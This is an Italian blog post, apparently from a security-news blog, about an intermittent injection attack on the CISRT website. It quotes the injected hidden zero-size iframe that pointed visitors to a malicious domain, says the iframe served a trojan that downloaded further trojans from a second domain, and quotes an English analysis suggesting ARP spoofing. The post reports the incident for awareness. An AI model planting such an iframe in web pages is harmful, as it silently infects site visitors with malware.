In alcune pagine del CISRT un'iframe del tipo :
<-iframe src="http://mms.nmmmn.com/%3Cremoved">.htm width=0 height=0 frameborder=0&amp;gt;
Scaricava silenziosamente un trojan (sms.exe) il quale a sua volta ,una volta eseguito, scarivata altri 20 trojan dal dominio ganbibi.com.
Gli attacchi di tipo injection sono ormai noti ,ma questo presenta una piccola variante.
Si tratta di un tipo di attacco "itermittente" ,che aumenta la propria durata di vita mascherandosi attraverso delle pagine random. E' difficile risalire alle vere pagine maligne ,poichè si dovrebbero monitorare tutte le connessioni intermedie tra il visitatore ed il sito.
Come scrive il portale beskerming.com:
What is different in this case is that the hack is only being served to seemingly random site visitors.This is actually quite an interesting method that can will extend the useful life of a hack by making it harder to isolate and investigate. With intermittent attacks on visitors it also means that investigators need to look at all of the intermediate connections between site visitors and the website. With multiple reports from different users it suggests that whatever is happening is not due to an infection on the systems belonging to site visitors.
Attention is currently being focussed on the possibility of an ARP spoofing / injection attack that is directing visitors to download malicious content from either nmmmn.com or ganbibi.com. To be successful against a broad sample of visitors, from a number of ISPs, such an attack would need to be launched and maintained from either the webhost / server hosting the CISRT website, or from a network chokepoint(s) that is common to most requests coming into the site.
Nessun commento:
Posta un commento